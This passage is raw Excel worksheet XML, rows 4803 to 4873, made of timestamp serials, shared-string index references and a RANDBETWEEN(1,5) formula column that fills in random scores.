    <row r="4803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4803" s="1">
        <v>43469.148425925923</v>
      </c>
      <c r="B4803" t="s">
        <v>5</v>
      </c>
      <c r="C4803" t="s">
        <v>10</v>
      </c>
      <c r="D4803" t="s">
        <v>14</v>
      </c>
      <c r="E4803" t="s">
        <v>4564</v>
      </c>
      <c r="F4803">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4804" s="1">
        <v>43469.096956018519</v>
      </c>
      <c r="B4804" t="s">
        <v>5</v>
      </c>
      <c r="C4804" t="s">
        <v>41</v>
      </c>
      <c r="E4804" t="s">
        <v>4565</v>
      </c>
      <c r="F4804">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4805" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4805" s="1">
        <v>43469.037557870368</v>
      </c>
      <c r="B4805" t="s">
        <v>1305</v>
      </c>
      <c r="C4805" t="s">
        <v>41</v>
      </c>
      <c r="E4805" s="2" t="s">
        <v>4566</v>
      </c>
      <c r="F4805">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4806" s="1">
        <v>43469.028726851851</v>
      </c>
      <c r="B4806" t="s">
        <v>5</v>
      </c>
      <c r="C4806" t="s">
        <v>139</v>
      </c>
      <c r="E4806" t="s">
        <v>4567</v>
      </c>
      <c r="F4806">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4807" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4807" s="1">
        <v>43469.028171296297</v>
      </c>
      <c r="B4807" t="s">
        <v>19</v>
      </c>
      <c r="C4807" t="s">
        <v>139</v>
      </c>
      <c r="E4807" s="2" t="s">
        <v>4568</v>
      </c>
      <c r="F4807">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4808" s="1">
        <v>43469.002326388887</v>
      </c>
      <c r="B4808" t="s">
        <v>5</v>
      </c>
      <c r="C4808" t="s">
        <v>253</v>
      </c>
      <c r="E4808" t="s">
        <v>4569</v>
      </c>
      <c r="F4808">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4809" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4809" s="1">
        <v>43468.999560185184</v>
      </c>
      <c r="B4809" t="s">
        <v>19</v>
      </c>
      <c r="C4809" t="s">
        <v>41</v>
      </c>
      <c r="E4809" s="2" t="s">
        <v>4570</v>
      </c>
      <c r="F4809">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4810" s="1">
        <v>43468.999050925922</v>
      </c>
      <c r="B4810" t="s">
        <v>13</v>
      </c>
      <c r="C4810" t="s">
        <v>1341</v>
      </c>
      <c r="E4810" t="s">
        <v>4571</v>
      </c>
      <c r="F4810">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4811" s="1">
        <v>43468.899837962963</v>
      </c>
      <c r="B4811" t="s">
        <v>1305</v>
      </c>
      <c r="C4811" t="s">
        <v>10</v>
      </c>
      <c r="D4811" t="s">
        <v>46</v>
      </c>
      <c r="F4811">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4812" s="1">
        <v>43468.823587962965</v>
      </c>
      <c r="B4812" t="s">
        <v>5</v>
      </c>
      <c r="C4812" t="s">
        <v>10</v>
      </c>
      <c r="D4812" t="s">
        <v>6</v>
      </c>
      <c r="E4812" t="s">
        <v>4572</v>
      </c>
      <c r="F4812">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4813" s="1">
        <v>43468.806307870371</v>
      </c>
      <c r="B4813" t="s">
        <v>13</v>
      </c>
      <c r="C4813" t="s">
        <v>10</v>
      </c>
      <c r="D4813" t="s">
        <v>107</v>
      </c>
      <c r="E4813" t="s">
        <v>4573</v>
      </c>
      <c r="F4813">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4814" s="1">
        <v>43468.799780092595</v>
      </c>
      <c r="B4814" t="s">
        <v>19</v>
      </c>
      <c r="C4814" t="s">
        <v>140</v>
      </c>
      <c r="D4814" t="s">
        <v>847</v>
      </c>
      <c r="E4814" t="s">
        <v>4574</v>
      </c>
      <c r="F4814">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4815" s="1">
        <v>43468.767060185186</v>
      </c>
      <c r="B4815" t="s">
        <v>5</v>
      </c>
      <c r="C4815" t="s">
        <v>6</v>
      </c>
      <c r="D4815" t="s">
        <v>821</v>
      </c>
      <c r="E4815" t="s">
        <v>4575</v>
      </c>
      <c r="F4815">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4816" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4816" s="1">
        <v>43468.74050925926</v>
      </c>
      <c r="B4816" t="s">
        <v>5</v>
      </c>
      <c r="C4816" t="s">
        <v>10</v>
      </c>
      <c r="D4816" t="s">
        <v>11</v>
      </c>
      <c r="E4816" s="2" t="s">
        <v>4576</v>
      </c>
      <c r="F4816">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4817" s="1">
        <v>43468.727824074071</v>
      </c>
      <c r="B4817" t="s">
        <v>5</v>
      </c>
      <c r="C4817" t="s">
        <v>10</v>
      </c>
      <c r="D4817" t="s">
        <v>36</v>
      </c>
      <c r="E4817" t="s">
        <v>4577</v>
      </c>
      <c r="F4817">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4818" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4818" s="1">
        <v>43468.70207175926</v>
      </c>
      <c r="B4818" t="s">
        <v>19</v>
      </c>
      <c r="C4818" t="s">
        <v>10</v>
      </c>
      <c r="D4818" t="s">
        <v>263</v>
      </c>
      <c r="E4818" s="2" t="s">
        <v>4578</v>
      </c>
      <c r="F4818">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4819" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4819" s="1">
        <v>43468.701018518521</v>
      </c>
      <c r="B4819" t="s">
        <v>13</v>
      </c>
      <c r="C4819" t="s">
        <v>10</v>
      </c>
      <c r="D4819" t="s">
        <v>92</v>
      </c>
      <c r="E4819" s="2" t="s">
        <v>4579</v>
      </c>
      <c r="F4819">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4820" s="1">
        <v>43468.698113425926</v>
      </c>
      <c r="B4820" t="s">
        <v>13</v>
      </c>
      <c r="C4820" t="s">
        <v>10</v>
      </c>
      <c r="D4820" t="s">
        <v>271</v>
      </c>
      <c r="E4820" t="s">
        <v>4580</v>
      </c>
      <c r="F4820">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4821" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4821" s="1">
        <v>43468.698055555556</v>
      </c>
      <c r="B4821" t="s">
        <v>19</v>
      </c>
      <c r="C4821" t="s">
        <v>10</v>
      </c>
      <c r="D4821" t="s">
        <v>80</v>
      </c>
      <c r="E4821" s="2" t="s">
        <v>4581</v>
      </c>
      <c r="F4821">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4822" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4822" s="1">
        <v>43468.69804398148</v>
      </c>
      <c r="B4822" t="s">
        <v>19</v>
      </c>
      <c r="C4822" t="s">
        <v>10</v>
      </c>
      <c r="D4822" t="s">
        <v>80</v>
      </c>
      <c r="E4822" s="2" t="s">
        <v>4581</v>
      </c>
      <c r="F4822">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4823" s="1">
        <v>43468.696481481478</v>
      </c>
      <c r="B4823" t="s">
        <v>5</v>
      </c>
      <c r="C4823" t="s">
        <v>6</v>
      </c>
      <c r="D4823" t="s">
        <v>25</v>
      </c>
      <c r="E4823" t="s">
        <v>4582</v>
      </c>
      <c r="F4823">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4824" s="1">
        <v>43468.669050925928</v>
      </c>
      <c r="B4824" t="s">
        <v>13</v>
      </c>
      <c r="C4824" t="s">
        <v>10</v>
      </c>
      <c r="D4824" t="s">
        <v>6</v>
      </c>
      <c r="E4824" t="s">
        <v>4583</v>
      </c>
      <c r="F4824">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4825" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4825" s="1">
        <v>43468.660682870373</v>
      </c>
      <c r="B4825" t="s">
        <v>1305</v>
      </c>
      <c r="C4825" t="s">
        <v>290</v>
      </c>
      <c r="E4825" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="F4825">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4826" s="1">
        <v>43468.646412037036</v>
      </c>
      <c r="B4826" t="s">
        <v>5</v>
      </c>
      <c r="C4826" t="s">
        <v>41</v>
      </c>
      <c r="E4826" t="s">
        <v>4585</v>
      </c>
      <c r="F4826">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4827" s="1">
        <v>43468.643043981479</v>
      </c>
      <c r="B4827" t="s">
        <v>13</v>
      </c>
      <c r="C4827" t="s">
        <v>6</v>
      </c>
      <c r="E4827" t="s">
        <v>4586</v>
      </c>
      <c r="F4827">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4828" s="1">
        <v>43468.642569444448</v>
      </c>
      <c r="C4828" t="s">
        <v>6</v>
      </c>
      <c r="D4828" t="s">
        <v>25</v>
      </c>
      <c r="E4828" t="s">
        <v>4587</v>
      </c>
      <c r="F4828">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4829" s="1">
        <v>43468.641932870371</v>
      </c>
      <c r="C4829" t="s">
        <v>6</v>
      </c>
      <c r="E4829" t="s">
        <v>4588</v>
      </c>
      <c r="F4829">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4830" s="1">
        <v>43468.641041666669</v>
      </c>
      <c r="C4830" t="s">
        <v>6</v>
      </c>
      <c r="E4830" t="s">
        <v>4589</v>
      </c>
      <c r="F4830">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4831" s="1">
        <v>43468.640335648146</v>
      </c>
      <c r="C4831" t="s">
        <v>6</v>
      </c>
      <c r="E4831" t="s">
        <v>4590</v>
      </c>
      <c r="F4831">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4832" s="1">
        <v>43468.639849537038</v>
      </c>
      <c r="C4832" t="s">
        <v>6</v>
      </c>
      <c r="E4832" t="s">
        <v>4591</v>
      </c>
      <c r="F4832">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4833" s="1">
        <v>43468.638784722221</v>
      </c>
      <c r="C4833" t="s">
        <v>6</v>
      </c>
      <c r="E4833" t="s">
        <v>4592</v>
      </c>
      <c r="F4833">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4834" s="1">
        <v>43468.637164351851</v>
      </c>
      <c r="C4834" t="s">
        <v>6</v>
      </c>
      <c r="D4834" t="s">
        <v>25</v>
      </c>
      <c r="E4834" t="s">
        <v>4593</v>
      </c>
      <c r="F4834">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4835" s="1">
        <v>43468.635729166665</v>
      </c>
      <c r="C4835" t="s">
        <v>6</v>
      </c>
      <c r="E4835" t="s">
        <v>27</v>
      </c>
      <c r="F4835">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4836" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4836" s="1">
        <v>43468.629687499997</v>
      </c>
      <c r="B4836" t="s">
        <v>5</v>
      </c>
      <c r="C4836" t="s">
        <v>10</v>
      </c>
      <c r="D4836" t="s">
        <v>178</v>
      </c>
      <c r="E4836" s="2" t="s">
        <v>4594</v>
      </c>
      <c r="F4836">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4837" s="1">
        <v>43468.619699074072</v>
      </c>
      <c r="B4837" t="s">
        <v>5</v>
      </c>
      <c r="C4837" t="s">
        <v>10</v>
      </c>
      <c r="D4837" t="s">
        <v>290</v>
      </c>
      <c r="E4837" t="s">
        <v>4595</v>
      </c>
      <c r="F4837">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4838" s="1">
        <v>43468.599618055552</v>
      </c>
      <c r="C4838" t="s">
        <v>6</v>
      </c>
      <c r="E4838" t="s">
        <v>4596</v>
      </c>
      <c r="F4838">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4839" s="1">
        <v>43468.593923611108</v>
      </c>
      <c r="B4839" t="s">
        <v>5</v>
      </c>
      <c r="C4839" t="s">
        <v>10</v>
      </c>
      <c r="D4839" t="s">
        <v>336</v>
      </c>
      <c r="E4839" t="s">
        <v>4597</v>
      </c>
      <c r="F4839">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4840" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4840" s="1">
        <v>43468.584282407406</v>
      </c>
      <c r="B4840" t="s">
        <v>19</v>
      </c>
      <c r="C4840" t="s">
        <v>10</v>
      </c>
      <c r="D4840" t="s">
        <v>80</v>
      </c>
      <c r="E4840" s="2" t="s">
        <v>4598</v>
      </c>
      <c r="F4840">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4841" s="1">
        <v>43468.576724537037</v>
      </c>
      <c r="B4841" t="s">
        <v>5</v>
      </c>
      <c r="C4841" t="s">
        <v>6</v>
      </c>
      <c r="D4841" t="s">
        <v>25</v>
      </c>
      <c r="E4841" t="s">
        <v>4599</v>
      </c>
      <c r="F4841">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4842" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4842" s="1">
        <v>43468.565949074073</v>
      </c>
      <c r="B4842" t="s">
        <v>19</v>
      </c>
      <c r="C4842" t="s">
        <v>10</v>
      </c>
      <c r="D4842" t="s">
        <v>178</v>
      </c>
      <c r="E4842" s="2" t="s">
        <v>4600</v>
      </c>
      <c r="F4842">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4843" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4843" s="1">
        <v>43468.565601851849</v>
      </c>
      <c r="B4843" t="s">
        <v>13</v>
      </c>
      <c r="C4843" t="s">
        <v>6</v>
      </c>
      <c r="D4843" t="s">
        <v>2139</v>
      </c>
      <c r="E4843" s="2" t="s">
        <v>4601</v>
      </c>
      <c r="F4843">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4844" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4844" s="1">
        <v>43468.552893518521</v>
      </c>
      <c r="B4844" t="s">
        <v>19</v>
      </c>
      <c r="C4844" t="s">
        <v>6</v>
      </c>
      <c r="D4844" t="s">
        <v>25</v>
      </c>
      <c r="E4844" s="2" t="s">
        <v>4602</v>
      </c>
      <c r="F4844">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4845" s="1">
        <v>43468.540011574078</v>
      </c>
      <c r="B4845" t="s">
        <v>19</v>
      </c>
      <c r="C4845" t="s">
        <v>60</v>
      </c>
      <c r="E4845" t="s">
        <v>4603</v>
      </c>
      <c r="F4845">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4846" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A4846" s="1">
        <v>43468.530671296299</v>
      </c>
      <c r="B4846" t="s">
        <v>19</v>
      </c>
      <c r="C4846" t="s">
        <v>10</v>
      </c>
      <c r="D4846" t="s">
        <v>494</v>
      </c>
      <c r="E4846" s="2" t="s">
        <v>4604</v>
      </c>
      <c r="F4846">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4847" s="1">
        <v>43468.515914351854</v>
      </c>
      <c r="B4847" t="s">
        <v>5</v>
      </c>
      <c r="C4847" t="s">
        <v>2104</v>
      </c>
      <c r="E4847" t="s">
        <v>4605</v>
      </c>
      <c r="F4847">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4848" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4848" s="1">
        <v>43468.513564814813</v>
      </c>
      <c r="B4848" t="s">
        <v>35</v>
      </c>
      <c r="C4848" t="s">
        <v>65</v>
      </c>
      <c r="E4848" t="s">
        <v>4606</v>
      </c>
      <c r="F4848">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4849" s="1">
        <v>43468.501435185186</v>
      </c>
      <c r="B4849" t="s">
        <v>5</v>
      </c>
      <c r="C4849" t="s">
        <v>10</v>
      </c>
      <c r="E4849" t="s">
        <v>4607</v>
      </c>
      <c r="F4849">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4850" s="1">
        <v>43468.501435185186</v>
      </c>
      <c r="B4850" t="s">
        <v>5</v>
      </c>
      <c r="C4850" t="s">
        <v>10</v>
      </c>
      <c r="E4850" t="s">
        <v>4607</v>
      </c>
      <c r="F4850">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4851" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4851" s="1">
        <v>43468.500497685185</v>
      </c>
      <c r="B4851" t="s">
        <v>5</v>
      </c>
      <c r="C4851" t="s">
        <v>10</v>
      </c>
      <c r="D4851" t="s">
        <v>112</v>
      </c>
      <c r="E4851" t="s">
        <v>4608</v>
      </c>
      <c r="F4851">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4852" s="1">
        <v>43468.498518518521</v>
      </c>
      <c r="B4852" t="s">
        <v>19</v>
      </c>
      <c r="C4852" t="s">
        <v>124</v>
      </c>
      <c r="E4852" t="s">
        <v>4609</v>
      </c>
      <c r="F4852">
        <f t="shared" ca="1" si="75"/>
        <v>5</v>
      </c>
    </row>
    <row r="4853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4853" s="1">
        <v>43468.479189814818</v>
      </c>
      <c r="B4853" t="s">
        <v>13</v>
      </c>
      <c r="C4853" t="s">
        <v>41</v>
      </c>
      <c r="E4853" t="s">
        <v>4610</v>
      </c>
      <c r="F4853">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4854" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4854" s="1">
        <v>43468.45952546296</v>
      </c>
      <c r="B4854" t="s">
        <v>5</v>
      </c>
      <c r="C4854" t="s">
        <v>65</v>
      </c>
      <c r="E4854" s="2" t="s">
        <v>4611</v>
      </c>
      <c r="F4854">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4855" s="1">
        <v>43468.443020833336</v>
      </c>
      <c r="B4855" t="s">
        <v>13</v>
      </c>
      <c r="C4855" t="s">
        <v>10</v>
      </c>
      <c r="D4855" t="s">
        <v>80</v>
      </c>
      <c r="E4855" t="s">
        <v>4612</v>
      </c>
      <c r="F4855">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4856" s="1">
        <v>43468.433067129627</v>
      </c>
      <c r="B4856" t="s">
        <v>13</v>
      </c>
      <c r="C4856" t="s">
        <v>10</v>
      </c>
      <c r="D4856" t="s">
        <v>52</v>
      </c>
      <c r="E4856" t="s">
        <v>4613</v>
      </c>
      <c r="F4856">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4857" s="1">
        <v>43468.431793981479</v>
      </c>
      <c r="B4857" t="s">
        <v>19</v>
      </c>
      <c r="C4857" t="s">
        <v>10</v>
      </c>
      <c r="D4857" t="s">
        <v>89</v>
      </c>
      <c r="F4857">
        <f t="shared" ca="1" si="75"/>
        <v>3</v>
      </c>
    </row>
    <row r="4858" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4858" s="1">
        <v>43468.421724537038</v>
      </c>
      <c r="B4858" t="s">
        <v>13</v>
      </c>
      <c r="C4858" t="s">
        <v>10</v>
      </c>
      <c r="D4858" t="s">
        <v>23</v>
      </c>
      <c r="E4858" s="2" t="s">
        <v>4614</v>
      </c>
      <c r="F4858">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4859" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4859" s="1">
        <v>43468.419618055559</v>
      </c>
      <c r="B4859" t="s">
        <v>13</v>
      </c>
      <c r="C4859" t="s">
        <v>48</v>
      </c>
      <c r="E4859" s="2" t="s">
        <v>4615</v>
      </c>
      <c r="F4859">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4860" s="1">
        <v>43468.39770833333</v>
      </c>
      <c r="B4860" t="s">
        <v>1305</v>
      </c>
      <c r="C4860" t="s">
        <v>60</v>
      </c>
      <c r="E4860" t="s">
        <v>4616</v>
      </c>
      <c r="F4860">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4861" s="1">
        <v>43468.394999999997</v>
      </c>
      <c r="B4861" t="s">
        <v>19</v>
      </c>
      <c r="C4861" t="s">
        <v>41</v>
      </c>
      <c r="E4861" t="s">
        <v>4617</v>
      </c>
      <c r="F4861">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4862" s="1">
        <v>43468.366759259261</v>
      </c>
      <c r="B4862" t="s">
        <v>5</v>
      </c>
      <c r="C4862" t="s">
        <v>461</v>
      </c>
      <c r="E4862" t="s">
        <v>4618</v>
      </c>
      <c r="F4862">
        <f t="shared" ca="1" si="75"/>
        <v>1</v>
      </c>
    </row>
    <row r="4863" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4863" s="1">
        <v>43468.346805555557</v>
      </c>
      <c r="B4863" t="s">
        <v>5</v>
      </c>
      <c r="C4863" t="s">
        <v>6</v>
      </c>
      <c r="D4863" t="s">
        <v>25</v>
      </c>
      <c r="E4863" s="2" t="s">
        <v>4619</v>
      </c>
      <c r="F4863">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4864" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4864" s="1">
        <v>43468.312731481485</v>
      </c>
      <c r="B4864" t="s">
        <v>13</v>
      </c>
      <c r="C4864" t="s">
        <v>48</v>
      </c>
      <c r="E4864" s="2" t="s">
        <v>4620</v>
      </c>
      <c r="F4864">
        <f t="shared" ca="1" si="75"/>
        <v>2</v>
      </c>
    </row>
    <row r="4865" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4865" s="1">
        <v>43468.276643518519</v>
      </c>
      <c r="B4865" t="s">
        <v>19</v>
      </c>
      <c r="C4865" t="s">
        <v>253</v>
      </c>
      <c r="E4865" t="s">
        <v>4621</v>
      </c>
      <c r="F4865">
        <f t="shared" ca="1" si="75"/>
        <v>4</v>
      </c>
    </row>
    <row r="4866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4866" s="1">
        <v>43468.268113425926</v>
      </c>
      <c r="B4866" t="s">
        <v>5</v>
      </c>
      <c r="C4866" t="s">
        <v>60</v>
      </c>
      <c r="E4866" t="s">
        <v>4622</v>
      </c>
      <c r="F4866">
        <f t="shared" ref="F4866:F4929" ca="1" si="76">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="4867" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4867" s="1">
        <v>43468.262083333335</v>
      </c>
      <c r="B4867" t="s">
        <v>19</v>
      </c>
      <c r="C4867" t="s">
        <v>41</v>
      </c>
      <c r="E4867" s="2" t="s">
        <v>4623</v>
      </c>
      <c r="F4867">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4868" s="1">
        <v>43468.214062500003</v>
      </c>
      <c r="B4868" t="s">
        <v>5</v>
      </c>
      <c r="C4868" t="s">
        <v>41</v>
      </c>
      <c r="E4868" t="s">
        <v>4624</v>
      </c>
      <c r="F4868">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4869" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4869" s="1">
        <v>43468.208240740743</v>
      </c>
      <c r="B4869" t="s">
        <v>19</v>
      </c>
      <c r="C4869" t="s">
        <v>29</v>
      </c>
      <c r="D4869" t="s">
        <v>229</v>
      </c>
      <c r="E4869" t="s">
        <v>4070</v>
      </c>
      <c r="F4869">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4870" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4870" s="1">
        <v>43468.184629629628</v>
      </c>
      <c r="B4870" t="s">
        <v>19</v>
      </c>
      <c r="C4870" t="s">
        <v>48</v>
      </c>
      <c r="E4870" s="2" t="s">
        <v>4625</v>
      </c>
      <c r="F4870">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4871" s="1">
        <v>43468.158171296294</v>
      </c>
      <c r="B4871" t="s">
        <v>5</v>
      </c>
      <c r="C4871" t="s">
        <v>50</v>
      </c>
      <c r="E4871" t="s">
        <v>4626</v>
      </c>
      <c r="F4871">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4872" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4872" s="1">
        <v>43468.121504629627</v>
      </c>
      <c r="B4872" t="s">
        <v>19</v>
      </c>
      <c r="C4872" t="s">
        <v>71</v>
      </c>
      <c r="E4872" s="2" t="s">
        <v>4627</v>
      </c>
      <c r="F4872">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4873" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4873" s="1">
        <v>43468.085474537038</v>
      </c>
      <c r="B4873" t="s">
        <v>5</v>
      </c>
      <c r="C4873" t="s">
        <v>41</v>
      </c>
      <c r="E4873" s="2" t="s">
        <v>4628</v>
      </c>
      <c r="F4873">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
